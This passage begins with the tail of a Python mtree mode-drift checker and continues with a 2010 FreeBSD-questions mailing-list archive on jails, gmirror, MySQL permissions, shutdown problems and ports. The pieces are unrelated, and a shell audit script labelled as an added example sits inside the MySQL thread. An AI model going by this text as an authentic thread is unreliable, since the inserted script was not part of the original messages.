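/set type=dir uname=root gname=wheel mode=0755
.
    etc
        mtree
        ..
    ..
    root
    ..
    tmp             mode=01777
    ..
..
"""


def _keywords(words):
    """Turn ['mode=0755', 'uname=root'] into a dict; bare words map to ''."""
    return dict(w.split("=", 1) if "=" in w else (w, "") for w in words)


def effective_keywords(spec_text, wanted):
    """Walk the spec and return the keywords that apply to `wanted`."""
    defaults, stack = {}, []
    for raw in spec_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        words = line.split()
        if words[0] == "/set":            # defaults for every later entry
            defaults.update(_keywords(words[1:]))
        elif words[0] == "/unset":
            for key in words[1:]:
                defaults.pop(key, None)
        elif words[0] == "..":            # leave the current directory
            if stack:
                stack.pop()
        else:
            merged = dict(defaults)
            merged.update(_keywords(words[1:]))   # entry overrides /set
            stack.append(words[0])
            path = "/" + "/".join(stack[1:])      # stack[0] is "."
            if path == "/" + wanted.strip("/"):
                return merged
            if merged.get("type") != "dir":
                stack.pop()               # only directories are descended into
    return None


def mode_drift(spec_text, path, actual_mode):
    """Return (spec_mode, actual_mode) when the two differ, else None."""
    entry = effective_keywords(spec_text, path)
    if entry is None or "mode" not in entry:
        return None                       # the spec does not manage this mode
    spec_mode = int(entry["mode"], 8)
    return None if spec_mode == actual_mode else (spec_mode, actual_mode)


if __name__ == "__main__":
    drift = mode_drift(SAMPLE_SPEC, "/root", 0o700)
    if drift:
        print("/root: spec says %04o, directory is %04o" % drift)
```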


Re: using leds on laptop

2010-02-01 Thread Polytropon
On Mon, 1 Feb 2010 20:22:22 +0200, Eitan Adler eitanadlerl...@gmail.com wrote:
 My laptop has a led for wireless - It has never been used since I
 installed freeBSD on this laptop. I was wondering if there was a way I could
 figure out a) if freeBSD detects it b) a way to use it for something

I'm not sure if FreeBSD will detect the pure LED, but as
you mentioned that it is labelled wireless, it is in
relation to the WLAN inside the laptop. Maybe there's a
device driver functionality that activates the LED when
the WLAN device is active?

But like with most modern inventions (such as jacks for
phones and speakers that are controlled by a driver, or
other nonsense), this issue will be so specific that
there's only a very specific driver for an arbitrary
version of Windows that utilizes hidden code inside
the laptop's secret circuits to switch the LED on. :-)

Do you use the laptop's WLAN, and does the LED correspond
to any state (like activated, connected, scanning etc.) of
the WLAN?

Anyway, I would predict that you won't find an easy way
to utilize this LED except you're writing a driver for it
with specifications the laptop's manufacturer will sell to
you if you put enough money onto the table. :-)

Otherwise, it's completely useless.

By the way, I have an older Toshiba laptop with a mechanical
switch for the WLAN component. It activates a LED regardless
of any OS-internal setting, maybe it's just switching the
WLAN component's power off and on, along with the LED. But
that's not modern - today's devices need a driver for that. :-)

As I said: Useless stuff.


-- 
Polytropon
Magdeburg, Germany
Happy FreeBSD user since 4.0
Andra moi ennepe, Mousa, ...


Re: using leds on laptop

2010-02-01 Thread Eitan Adler
I'm not sure if FreeBSD will detect the pure LED, but as

 you mentioned that it is labelled wireless, it is in
 relation to the WLAN inside the laptop. Maybe there's a
 device driver functionality that activates the LED when
 the WLAN device is active?


Might be - but I don't have windows so I have no way of testing


 Do you use the laptop's WLAN, and does the LED correspond
 to any state (like activated, connected, scanning etc.) of
 the WLAN?

I do use WLAN but it does not correspond to any specific state. Nor does the
physical switch change anything


 Anyway, I would predict that you won't find an easy way
 to utilize this LED except you're writing a driver for it
 with specifications the laptop's manufacturer will sell to
 you if you put enough money onto the table. :-)

 It happens to be a Lenovo laptop. If I could get a copy of the
specification it would make a nice project for me - writing a driver -
*wonders*


 Otherwise, it's completely useless.
 --
 Polytropon
 Magdeburg, Germany
 Happy FreeBSD user since 4.0
 Andra moi ennepe, Mousa, ...



Re: FTP using .netrc

2010-02-01 Thread J65nko
On Mon, Feb 1, 2010 at 11:11 AM, Fbsd1 fb...@a1poweruser.com wrote:
 Goal is to download the install source directory tree so I can use it as
  an target for local ftp sysinstall.

 The problem is that the FreeBSD ftp server keeps timing out before
 everything is downloaded. This is the error message ftp gives me.

 421 Service not available, remote server timed out. Connection closed

 This is the command line command used to launch the ftp session
 ftp -v ftp.FreeBSD.org

 It defaults to using /root/.netrc which is shown below


 machine ftp.FreeBSD.org
 login anonymous
 password f...@home.com
 macdef init
 prompt off
 cd /pub/FreeBSD/releases/i386/8.0-RELEASE
 epsv4 off
 mget  ERRATA.HTM ERRATA.TXT HARDWARE.HTM HARDWARE.TXT README.HTM
 mget  README.TXT RELNOTES.HTM RELNOTES.TXT cdrom.inf docbook.css
 $ getdir base catpages dict doc games info kernels manpages ports  proflibs 
 src
 quit

 macdef getdir
 ! mkdir $i
 mget $i/*


 Question is how can I make FTP resume the download at the place it timed
 out. IE not start at the beginning and re-download all the same files
 already received. ftp -vR ftp.FreeBSD.org just starts downloading from
 the beginning again.

That .netrc looks familiar ;)

I never had that issue, but I always used a ftp mirror site listed in
the handbook, instead
of one of the busiest ftp sites in the world .;)


Using GPT partitions with gmirror

2010-02-01 Thread Peter Steele
Because we have large drives (2TB) we're switching to gpart to partition our 
disks. I had previously been using fdisk/bsdlabel and setting up specially 
configured partition tables that would work with gmirror. This involved faking 
the size of the c partition to make sure there was space for gmirror to store 
its metadata. Now that I'm using gpart I'm wondering if any of this trickery is 
needed? Can I simply create my partitions with gpart then create mirrored 
partitions using these partitions? I've tried this and it seems to work fine 
but I'm just being cautious.



Re: using leds on laptop

2010-02-01 Thread Brandon Gooch
On Mon, Feb 1, 2010 at 2:24 PM, Eitan Adler eitanadlerl...@gmail.com wrote:
 I'm not sure if FreeBSD will detect the pure LED, but as

 you mentioned that it is labelled wireless, it is in
 relation to the WLAN inside the laptop. Maybe there's a
 device driver functionality that activates the LED when
 the WLAN device is active?


 Might be - but I don't have windows so I have no way of testing


 Do you use the laptop's WLAN, and does the LED correspond
 to any state (like activated, connected, scanning etc.) of
 the WLAN?

 I do use WLAN but it does not correspond to any specific state. Nor does the
 physical switch change anything


 Anyway, I would predict that you won't find an easy way
 to utilize this LED except you're writing a driver for it
 with specifications the laptop's manufacturer will sell to
 you if you put enough money onto the table. :-)

  It happens to be a Lenovo laptop. If I could get a copy of the
 specification it would make a nice project for me - writing a driver -
 *wonders*


 Otherwise, it's completely useless.
 --
 Polytropon
 Magdeburg, Germany
 Happy FreeBSD user since 4.0
 Andra moi ennepe, Mousa, ...



If it's an Intel card (iwi(4), ipw(4), iwn(4)), it's a matter of
knowing what command to send to the firmware.

What device do you have in the laptop?

Check the dmesg(8) output...

-Brandon


Re: using leds on laptop

2010-02-01 Thread Eitan Adler
It is a Broadcom card and I need ndis to use it. I do not know if the light
is attached to the wireless card though (it appears next to the power and
charging lights)
ndis0: Broadcom 802.11g Network Adapter mem 0xf470-0xf4703fff irq 18
at device 0.0 on pci4
bge0: Broadcom BCM5906 A2, ASIC rev. 0xc002 mem 0xf460-0xf460 irq
17 at device 0.0 on pci7


On Mon, Feb 1, 2010 at 11:35 PM, Brandon Gooch
jamesbrandongo...@gmail.com wrote:

 On Mon, Feb 1, 2010 at 2:24 PM, Eitan Adler eitanadlerl...@gmail.com
 wrote:
  I'm not sure if FreeBSD will detect the pure LED, but as
 
  you mentioned that it is labelled wireless, it is in
  relation to the WLAN inside the laptop. Maybe there's a
  device driver functionality that activates the LED when
  the WLAN device is active?
 
 
  Might be - but I don't have windows so I have no way of testing
 
 
  Do you use the laptop's WLAN, and does the LED correspond
  to any state (like activated, connected, scanning etc.) of
  the WLAN?
 
  I do use WLAN but it does not correspond to any specific state. Nor does
 the
  physical switch change anything
 
 
  Anyway, I would predict that you won't find an easy way
  to utilize this LED except you're writing a driver for it
  with specifications the laptop's manufacturer will sell to
  you if you put enough money onto the table. :-)
 
   It happens to be a Lenovo laptop. If I could get a copy of the
  specification it would make a nice project for me - writing a driver -
  *wonders*
 
 
  Otherwise, it's completely useless.
  --
  Polytropon
  Magdeburg, Germany
  Happy FreeBSD user since 4.0
  Andra moi ennepe, Mousa, ...
 
 

 If it's an Intel card (iwi(4), ipw(4), iwn(4)), it's a matter of
 knowing what command to send to the firmware.

 What device do you have in the laptop?

 Check the dmesg(8) output...

 -Brandon



Re: Using GPT partitions with gmirror

2010-02-01 Thread Pavel Greenberg
On Mon, 1 Feb 2010 15:20:40 -0600, Peter Steele wrote
 Because we have large drives (2TB) we're switching to gpart to 
 partition our disks. I had previously been using fdisk/bsdlabel and 
 setting up specially configured partition tables that would work 
 with gmirror. This involved faking the size of the c partition to 
 make sure there was space for gmirror to store its metadata. Now 
 that I'm using gpart I'm wondering if any of this trickery is 
 needed? Can I simply create my partitions with gpart then create 
 mirrored partitions using these partitions? I've tried this and it 
 seems to work fine but I'm just being cautious.

http://lists.freebsd.org/pipermail/freebsd-questions/2009-July/201891.html


How far to go with jailing?

2010-02-01 Thread Jeff Mitchell


	Strikes me that setting up jails for bloody-well-every-other 
service might be 'fun' ..


	Jail the webserver; seems a logical break, and keep you honest for 
your partitioning. No more ~/public_html to access it I suppose, but much 
more secure for when people attack your wordpress etc.


	Jail the 'email services'; use fetchmail to pull down to the jail, 
and IMAP and POP3 to serve the mail even to local clients; nice clean 
email mini-server right there in the jail?


	Jail SMB-serving, so if attacked it still can only serve the 
content in the very well defined area.


Jail the mailing list (mailman etc) .. keep things nice and clean.

	But is setting up a whole stack of jails a pain? a performance 
problem? or just un-necessary overkill? Or a good idea?


jeff

--
If everyone would put barbecue sauce on their food, there would be no war.


Re: How far to go with jailing?

2010-02-01 Thread ill...@gmail.com
On 1 February 2010 20:57, Jeff Mitchell skee...@skeleton.org wrote:

        Strikes me that setting up jails for bloody-well-every-other service
 might be 'fun' ..

        Jail the webserver; seems a logical break, and keep you honest for
 your partitioning. No more ~/public_html to access it I suppose, but much
 more secure for when people attack your wordpress etc.

        Jail the 'email services'; use fetchmail to pull down to the jail,
 and IMAP and POP3 to serve the mail even to local clients; nice clean email
 mini-server right there in the jail?

        Jail SMB-serving, so if attacked it still can only serve the content
 in the very well defined area.

        Jail the mailing list (mailman etc) .. keep things nice and clean.

        But is setting up a whole stack of jails a pain? a performance
 problem? or just un-necessary overkill? Or a good idea?


I don't know about the performance, though given what I
[believe I] know, if your machine is already running those
serv[ice|er]s, the effect ranges from lightly noticeable to
entirely negligible.  You do have to keep track of the jails
(update when necessary), though I suppose if you can't
write scripts to do the tedious bits you might be in the
wrong business.

I think it's a good idea, frankly.  Lift and separate, as they
said in the 1990s.

-- 
--


Shutdown

2010-02-01 Thread Jeff Molofee
I have completely lost the ability to shutdown/reboot/logout... I've 
found a few pages on this issue, and nothing seems to resolve the 
issue.  I'm in wheel, operator groups, hal, dbus, gnome_enable all 
set... consolekit showing a token, proc mounted... and still nothing... 
what else could be wrong?




Re: Shutdown

2010-02-01 Thread Warren Block

On Mon, 1 Feb 2010, Jeff Molofee wrote:

I have completely lost the ability to shutdown/reboot/logout... I've found a 
few pages on this issue, and nothing seems to resolve the issue.  I'm in 
wheel, operator groups, hal, dbus, gnome_enable all set... consolekit showing 
a token, proc mounted... and still nothing... what else could be wrong?


How are you trying to trigger a shutdown, and in what environment? 
There are PolicyKit settings you need:


http://groups.google.com/group/comp.unix.bsd.freebsd.misc/msg/0d049accfb7fa387?dmode=source

There was that recent policykit/polkit port upgrade, too.

-Warren Block * Rapid City, South Dakota USA


Re: How far to go with jailing?

2010-02-01 Thread Steve Bertrand
Jeff Mitchell wrote:
 
 Strikes me that setting up jails for bloody-well-every-other service
 might be 'fun' ..

...

 Jail the webserver; seems a logical break, and keep you honest for
 your partitioning. No more ~/public_html to access it I suppose, but
 much more secure for when people attack your wordpress etc.

To us, ~/public_html is important, and needs to be considered for our
primary domain. This is legacy, going back to 1995.

 Jail the 'email services'; use fetchmail to pull down to the jail,
 and IMAP and POP3 to serve the mail even to local clients; nice clean
 email mini-server right there in the jail?

On a home system, sounds great!

 Jail SMB-serving, so if attacked it still can only serve the content
 in the very well defined area.

...should be separated physically, IMHO, unless it's a home server.

 Jail the mailing list (mailman etc) .. keep things nice and clean.
 
 But is setting up a whole stack of jails a pain? a performance
 problem? or just un-necessary overkill? Or a good idea?

It's a management pain.

In a production ISP/hosting environment, you still have to treat each
jail as if it's a server.

The more servers you have, the more maintenance and management you have.

I don't think that there is an easy answer to what you're asking.

Personally, I use jails to segregate top-level functions that I want to
put into development and possibly further into production.

- DNS
- SMTP, IMAP, POP3
- authentication (RADIUS etc)
- HTTP etc
- software devel, web
- software devel, non-web
- devel software implementation, testing
-   inline with production
- build processes (testing new features of FBSD)
- stage area of test builds, prior to implementation
- protocol testing (ie. IPv6)

...after that, I've always chosen to put each core critical function
onto a separate physical server, and then replicate it to another
physical server.

However, I have been toying/researching the idea of replicating 'jails'
across the network to separate physical hardware, as it would save
physical space, hydro, network drops etc for each box that we have.

Other than knowing what hardware we have in our PoPs, I use SSH to
communicate with every device that I have, so if someone else set it up
for me, I wouldn't know that it's a jail.

Use jails to define boundaries. Don't get overzealous. I don't see the
need to put each web hosting client within their own jail, unless you
determine the risk warrants such. Same for email. If risk is that high,
then that particular client should pay for collocation anyway ;)

It comes down to what you can consider as your risk assessment. If you
are just playing along at home, set up as many as you can, and test for
yourself.

Performance hit is dependent on the hardware that you are running. I
don't notice any difference on a standard box with a couple of jails
over one that doesn't have any...

Steve


Re: How can I copy the data of buf in kernel space to the uio structure in user space.

2010-02-01 Thread Steve Bertrand
Jun Furukawa wrote:
 Hi,
 For my research, I am now hooking the function vn_write().

[ big snip ]

 How can I solve this problem?

Subscribe to freebsd-hackers@, and post your message there. Hopefully
they can help.

Steve


Re: using leds on laptop

2010-02-01 Thread Chad Perrin
On Mon, Feb 01, 2010 at 10:24:41PM +0200, Eitan Adler wrote:
 
  It happens to be a Lenovo laptop. If I could get a copy of the
 specification it would make a nice project for me - writing a driver -
 *wonders*

Which Lenovo laptop model is it?

-- 
Chad Perrin [ original content licensed OWL: http://owl.apotheon.org ]




Re: mysql silently failing to start - suggestions? (FIXED!)

2010-02-01 Thread John
On Sun, Jan 31, 2010 at 11:35:22PM -0500, Michael Powell wrote:
 John wrote:
 
  If this isn't the right list - if I should try another let me know -
  but since this is the mysql-server-5.4.2 package, and since you
  folks have been so helpful, I thought I'd give it a go.
  
  Anyway, the system is 8.0-RELEASE and that package is installed,
  and I can't start the server.  Not only can I not start the server,
  but it's not giving me a clue.  I can't find anything anywhere.
  Not in /var/log/messages, not anywhere.  When I run
  /usr/local/etc/rc.d/mysqlserver start
  it says Starting mysql., pauses for several seconds (I don't see
  anything go by in top) and then the script exits.  At that point,
  one would expect, there's no /tmp/mysql.sock, there's nothing
  in messages or anywhere else.  With nothing to go on, well, I don't
  know where to start.  Any suggestions?
 
 First is there a mysql_enable=YES line in /etc/rc.conf? The rc subr 
 startup system requires it and also the complete path as you did type above. 
 Although since it is mysql-server and you got a response I'll assume the 
 above is just a typo here in this mail.
 
 If you have changed the location of the database files this variable will 
 need setting in /etc/rc.conf as well. The default is /var/db/mysql. Notice 
 this directory should be owned by the mysql:mysql user/group combo. This 
 will allow for the writing of the machine-hostname.pid file. There will 
 also be a machine-hostname.err file which is the log you need to look at. 
 If these files are not present it is either not getting that far in the 
 startup, or there is a permissions problem. The normal location of the 
 socket is /tmp, which should be permissions 1777 (sticky bit set).
 
 You do have a line setting the hostname of the machine in /etc/rc.conf too, 
 right? Such as hostname=testbed.test.zip for my local dev server at home. 
 This should be resolvable either by DNS or a hosts file. Also, be aware that 
 the location of the my.cnf file is now /usr/local/etc, although should this 
 be missing it should still look for it in /var/db/mysql as a fallback. If 
 this file is world writable MySQL will ignore it.
 
 The establishment of the mysql user and group should have occurred as part 
 of the port installation. I use ports and not packages, as well as the older 
 version of 5.1.42 so I cannot speak to the efficacy of installing a package 
 of 5.4.x. Perhaps a package problem? Try installing the 5.1.42 port using 
 the ports system instead is one possibility if such may be the case.

Good job, Mike!  You nailed it, though what some of the other helpful
folks wrote had me on the right path, too.  For some reason, the
binary-configure after the pkg_add left everything owned by 
root:wheel.  cd /mysql ; chown -R mysql:mysql . was the solution.
After that, everything came out and flew straight!  Somehow, the mysql
user and group got created, but everything was still owned by root:wheel.
Go figure.

Just for the record, my rc.conf had already contained:
mysql_dbdir=/mysql
mysql_enable=YES
mysql_pidfile=/var/run/mysqld.pid

Also for the record, the last one is ignored.  The pid file
is still in /mysql/`hostname`.pid

So - for those of you who said don't try to run it anywhere but
/var/db/mysql - maybe you're right.  Maybe that's what led,
indirectly, to the ownership not getting set correctly.  But, once
you know the problem, the solution is simple, and it's now doing a
great job of running where I want it to run.
-- 

John Lind
j...@starfire.mn.org
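
The checks discussed in this thread (data directory owned by mysql:mysql, my.cnf not world-writable, socket directory mode 1777), collected into a script as an added example that is not part of the original messages. The function names are hypothetical; the paths and owner default to the values quoted above and can be overridden by arguments.

```sh
#!/bin/sh
# Added example: audit the MySQL start-up preconditions named in the thread.
# Uses only POSIX find(1) primaries, so it runs on FreeBSD and elsewhere.

# Print every entry under $1 that is not owned by user $2 and group $3.
misowned() {
    find "$1" \( ! -user "$2" -o ! -group "$3" \) -print
}

# True if $1 itself is world-writable (MySQL ignores such a my.cnf).
world_writable() {
    [ -n "$(find "$1" -prune -perm -0002 -print)" ]
}

# True if directory $1 is rwx for everyone and has the sticky bit (1777).
sticky_1777() {
    [ -n "$(find "$1" -prune -perm -1777 -print)" ]
}

# audit_mysql DBDIR MY_CNF SOCKDIR USER GROUP
# Prints findings and returns the number of problems found.
audit_mysql() {
    dbdir=$1 cnf=$2 sockdir=$3 user=$4 group=$5 problems=0
    if [ ! -d "$dbdir" ]; then
        echo "FAIL: $dbdir is not a directory"
        problems=$((problems + 1))
    elif ! bad=$(misowned "$dbdir" "$user" "$group"); then
        # find fails on an unknown user/group or an unreadable subtree
        echo "FAIL: could not fully check ownership under $dbdir"
        problems=$((problems + 1))
    elif [ -n "$bad" ]; then
        echo "FAIL: entries not owned by $user:$group (first 5 shown):"
        echo "$bad" | head -n 5
        problems=$((problems + 1))
    fi
    if [ -f "$cnf" ] && world_writable "$cnf"; then
        echo "FAIL: $cnf is world-writable and will be ignored"
        problems=$((problems + 1))
    fi
    if ! sticky_1777 "$sockdir"; then
        echo "FAIL: $sockdir is not mode 1777"
        problems=$((problems + 1))
    fi
    [ "$problems" -eq 0 ] && echo "OK: ownership and modes look right"
    return "$problems"
}

# Run only when a data directory is given, e.g.: sh thisfile /mysql
if [ "$#" -ge 1 ]; then
    audit_mysql "$1" "${2:-/usr/local/etc/my.cnf}" "${3:-/tmp}" \
        "${4:-mysql}" "${5:-mysql}"
fi
```

Run it as root so find can read every file under the data directory; a root:wheel tree like the one described above shows up as the first failure.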


Re: Shutdown

2010-02-01 Thread Erich Dollansky
Hi,

On 02 February 2010 am 10:18:28 Jeff Molofee wrote:
 I have completely lost the ability to shutdown/reboot/logout... I've 
 found a few pages on this issue, and nothing seems to resolve the 
 issue.  I'm in wheel, operator groups, hal, dbus, gnome_enable all 
 set... consolekit showing a token, proc mounted... and still nothing... 
 what else could be wrong?

what happens when you enter shutdown -p now in a console?

There should be some message?

Erich


Re: How far to go with jailing?

2010-02-01 Thread Erich Dollansky
Hi,

On 02 February 2010 am 09:57:13 Jeff Mitchell wrote:
 
   Strikes me that setting up jails for bloody-well-every-other 
 service might be 'fun' ..
 
it is just your work. As there is still only a single kernel running, there is 
no real difference.

But you must maintain every jail as every jail uses its own world.

I use jails once in a while. They give a good feeling and do not cost much to 
setup.

But - a big but - you must make sure that the data stays consistent over the 
jails. Jailing a webserver is not a problem. But putting file-servers for 
different protocols into different jails might be a problem. Letting different 
jails run accessing the same data, does not make sense for me.

Erich


fixing up port dependencies

2010-02-01 Thread John W
Hello all,

I'm going through a round of port upgrades and came upon a dependency issue.
I could probably muscle through and make it work, but I'd like to know
what people see as a correct solution to this problem. I'm still in
the process of grokking the nitty-gritty bits of ports.

Here's the issue:
I updated my ports tree with csup, and tried to run 'portmaster -na'.
It gave me this:

=== The mail/p5-Email-Simple-Creator port has been deleted:
Folded into p5-Email-Simple package

Ok, that makes sense. But what do I do to fix it?
It seems I need to replace dependencies on p5-Email-Simple-Creator
with dependencies on p5-Email-Simple.

But if I manually do that, won't my changes be blown away the next
time I update ports?

Perhaps I should use the '-o' (origin) option of portmaster? I'm not
100% sure how that works, incidentally.
I assume something like:

portmaster -o p5-Email-Simple p5-Email-Simple-Creator

Will those changes get blown away by the next update of ports?

Is the most correct solution just to wait until all maintainers of
ports which depend on p5-Email-Simple-Creator each update their
makefiles to depend on p5-Email-Simple, instead? (Though that doesn't
help in the short term :)

I'm curious of people's thoughts on this.

Thanks
-John